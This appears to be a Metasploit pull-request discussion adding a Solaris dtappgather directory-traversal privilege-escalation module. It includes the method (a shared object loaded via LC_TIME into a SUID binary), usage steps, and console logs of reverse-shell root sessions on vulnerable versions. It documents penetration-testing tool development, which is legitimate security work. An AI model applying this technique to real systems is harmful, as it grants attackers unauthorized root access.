Add Solaris 'EXTREMEPARR' dtappgather Privilege Escalation module

[bcoles]

Add Solaris 'EXTREMEPARR' dtappgather Privilege Escalation module.

    This module exploits a directory traversal vulnerability in the
    `dtappgather` executable included with Common Desktop Environment (CDE)
    on unpatched Solaris systems prior to Solaris 10u11 which allows users
    to gain root privileges.

    dtappgather allows users to create a user-owned directory at any
    location on the filesystem using the `DTUSERSESSION` environment
    variable.

    This module creates a directory in `/usr/lib/locale`, writes a shared
    object to the directory, and runs the specified SUID binary with the
    shared object loaded using the `LC_TIME` environment variable.

    This module has been tested successfully on:

    Solaris 9u7 (09/04) (x86);
    Solaris 10u1 (01/06) (x86);
    Solaris 10u2 (06/06) (x86);
    Solaris 10u4 (08/07) (x86);
    Solaris 10u8 (10/09) (x86);

Verification

• Start msfconsole
• Get a session
• use exploit/solaris/local/extremeparr_dtappgather_priv_esc
• set SESSION [SESSION]
• run
• You should get a new root session

Output

msf5 > use exploit/solaris/local/extremeparr_dtappgather_priv_esc 
msf5 exploit(solaris/local/extremeparr_dtappgather_priv_esc) > set session 1
session => 1
msf5 exploit(solaris/local/extremeparr_dtappgather_priv_esc) > set lhost 172.16.191.196
lhost => 172.16.191.196
msf5 exploit(solaris/local/extremeparr_dtappgather_priv_esc) > run
[*] Started reverse TCP handler on 172.16.191.196:4444 
[+] Created directory /usr/lib/locale/ExDmW
[*] Writing '/tmp/.Wfy7WpcZej/.pv7h2R.c' (170 bytes) ...
[*] Writing '/tmp/.Wfy7WpcZej/.uGjK3nLc5' (175 bytes) ...
[*] Executing payload...
[!] Tried to delete /var/dt/appconfig/appmanager, unknown result
[+] Deleted /tmp/.Wfy7WpcZej/.pv7h2R.c
[+] Deleted /tmp/.Wfy7WpcZej/.pv7h2R
[+] Deleted /usr/lib/locale/ExDmW/ExDmW.so.2
[+] Deleted /usr/lib/locale/ExDmW/ExDmW.so.3
[+] Deleted /tmp/.Wfy7WpcZej/.uGjK3nLc5
[+] Deleted /usr/lib/locale/ExDmW
[+] Deleted /tmp/.Wfy7WpcZej
id
uid=0(root) gid=0(root)
uname -a
SunOS unknown 5.10 Generic_118844-26 i86pc i386 i86pc
cat /etc/release
                        Solaris 10 1/06 s10x_u1wos_19a X86
           Copyright 2005 Sun Microsystems, Inc.  All Rights Reserved.
                        Use is subject to license terms.
                           Assembled 07 December 2005

[h00die]

Add 10u9 to the list.

msf5 exploit(solaris/local/extremeparr_dtappgather_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 1.1.1.1:4444 
[+] /usr/dt/bin/dtappgather is setuid
[+] /usr/bin/at is setuid
[+] gcc is installed
[+] Solaris version 5.10 appears to be vulnerable
[*] Cleaning appmanager directory /var/dt/appconfig/appmanager
[*] Creating directory /usr/lib/locale/PNjrx
[*] Symlinking /usr/lib/locale to /var/dt/appconfig/appmanager
[+] Created directory /usr/lib/locale/PNjrx
[*] Creating directory '/tmp/.gfiAL'
[*] Writing '/tmp/.gfiAL/.Rh2z4O.c' (166 bytes) ...
[*] Max line length is 262145
[*] Writing 166 bytes in 1 chunks of 571 bytes (octal-encoded), using printf
[*] Writing shared objects to /usr/lib/locale/PNjrx
[*] Writing '/tmp/.gfiAL/.I4aGhLwn1y' (175 bytes) ...
[*] Max line length is 262145
[*] Writing 175 bytes in 1 chunks of 534 bytes (octal-encoded), using printf
[*] Executing payload...
[*] Command shell session 2 opened (1.1.1.1:4444 -> 2.2.2.2:32797) at 2018-09-21 14:25:16 -0400
[!] Tried to delete /var/dt/appconfig/appmanager, unknown result
[+] Deleted /tmp/.gfiAL/.Rh2z4O.c
[+] Deleted /tmp/.gfiAL/.Rh2z4O
[+] Deleted /usr/lib/locale/PNjrx/PNjrx.so.2
[+] Deleted /usr/lib/locale/PNjrx/PNjrx.so.3
[+] Deleted /tmp/.gfiAL/.I4aGhLwn1y
[+] Deleted /usr/lib/locale/PNjrx
[+] Deleted /tmp/.gfiAL

cat /etc/release
                    Oracle Solaris 10 9/10 s10x_u9wos_14a X86

[h00die]

11.3 fails (as expected since its not vulnerable, and the payload would have failed anyways)

msf5 exploit(solaris/local/extremeparr_dtappgather_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 2.2.2.2:4444 
[-] /usr/dt/bin/dtappgather is not setuid
[-] Exploit aborted due to failure: not-vulnerable: Target is not vulnerable. Set ForceExploit to override.
[*] Exploit completed, but no session was created.

[h00die]

10u2

msf5 exploit(solaris/local/extremeparr_dtappgather_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 1.1.1.1:4444 
[+] /usr/dt/bin/dtappgather is setuid
[+] /usr/bin/at is setuid
[+] gcc is installed
[+] Solaris version 5.10 appears to be vulnerable
[*] Cleaning appmanager directory /var/dt/appconfig/appmanager
[*] Creating directory /usr/lib/locale/rpiRihd9
[*] Symlinking /usr/lib/locale to /var/dt/appconfig/appmanager
[+] Created directory /usr/lib/locale/rpiRihd9
[*] Creating directory '/tmp/.4qKYd8wVkW'
[*] Writing '/tmp/.4qKYd8wVkW/.Jfbb7u.c' (170 bytes) ...
[*] Max line length is 262145
[*] Writing 170 bytes in 1 chunks of 586 bytes (octal-encoded), using printf
[*] Writing shared objects to /usr/lib/locale/rpiRihd9
[*] Writing '/tmp/.4qKYd8wVkW/.roWJo1POK' (175 bytes) ...
[*] Max line length is 262145
[*] Writing 175 bytes in 1 chunks of 534 bytes (octal-encoded), using printf
[*] Executing payload...
[*] Command shell session 2 opened (1.1.1.1:4444 -> 2.2.2.2:32783) at 2018-09-21 15:02:37 -0400
[!] Tried to delete /var/dt/appconfig/appmanager, unknown result
[+] Deleted /tmp/.4qKYd8wVkW/.Jfbb7u.c
[+] Deleted /tmp/.4qKYd8wVkW/.Jfbb7u
[+] Deleted /usr/lib/locale/rpiRihd9/rpiRihd9.so.2
[+] Deleted /usr/lib/locale/rpiRihd9/rpiRihd9.so.3
[+] Deleted /tmp/.4qKYd8wVkW/.roWJo1POK
[+] Deleted /usr/lib/locale/rpiRihd9
[+] Deleted /tmp/.4qKYd8wVkW

id
uid=0(root) gid=0(root)
^Z
Background session 2? [y/N]  y
msf5 exploit(solaris/local/extremeparr_dtappgather_priv_esc) > sessions -i 1
[*] Starting interaction with 1...

id
uid=100(solaris) gid=1(other)

[h00die]

Any reason this is here and not in check?
Knowing you, there was a thought process behind the decision, just curious for consistency in other modules.

[h00die]

if it were in check, it could be bypassed by the force exploit.
Not sure why someone would still want to run it while being root, but at least it leaves that option open

[bcoles]

@h00die It's nice to be able to run the check method to determine whether a host is vulnerable, regardless of our current user context. The host is no more or less vulnerable if we're already root. If we're already root, the host isn't Safe.

There's a separate issue here, which is that there are instances where we'll want to execute the module, even if we are already root. In particular, the is_root? check is not namespace safe. It's quite possibly we'll have a session in a user namespace as root yet still want to execute the module to become real root UID 0.

I haven't had time to open an issue for discussion. My suggestion is to keep the is_root? check outside of the check method, while ensuring it is still included in a ForceExploit conditional in each module. However #10622 needs to be resolved before a code pattern can be developed and implemented in every local exploit module.

[h00die]

Release Notes

The Solaris EXTREMEPARR dtappgather module has been added to the framework. It exploits a direct traversal vulnerability in the dtappgather executable that is included on unpatched Solaris systems 10u11 and older. You can achieve root access with this exploit.